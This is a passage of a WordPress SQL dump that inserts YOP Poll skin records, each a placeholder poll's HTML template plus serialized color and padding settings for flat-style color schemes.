'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:6:"purple";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(37, 'basic-pretty', 'Flat Black', 'flat-black', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="black">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:5:"black";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(38, 'basic-pretty', 'Flat Red', 'flat-red', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="red">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:3:"red";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(39, 'basic-pretty', 'Flat Green', 'flat-green', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="green">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:5:"green";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(40, 'basic-pretty', 'Flat Blue', 'flat-blue', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="blue">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:4:"blue";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(41, 'basic-pretty', 'Flat Aero', 'flat-aero', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="aero">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:4:"aero";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(42, 'basic-pretty', 'Flat Grey', 'flat-grey', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="grey">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:4:"grey";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00');
INSERT INTO `wpou_yoppoll_skins` VALUES
(43, 'basic-pretty', 'Flat Orange', 'flat-orange', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="orange">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:6:"orange";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(44, 'basic-pretty', 'Flat Yellow', 'flat-yellow', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="yellow">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:6:"yellow";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(45, 'basic-pretty', 'Flat Pink', 'flat-pink', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="pink">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li 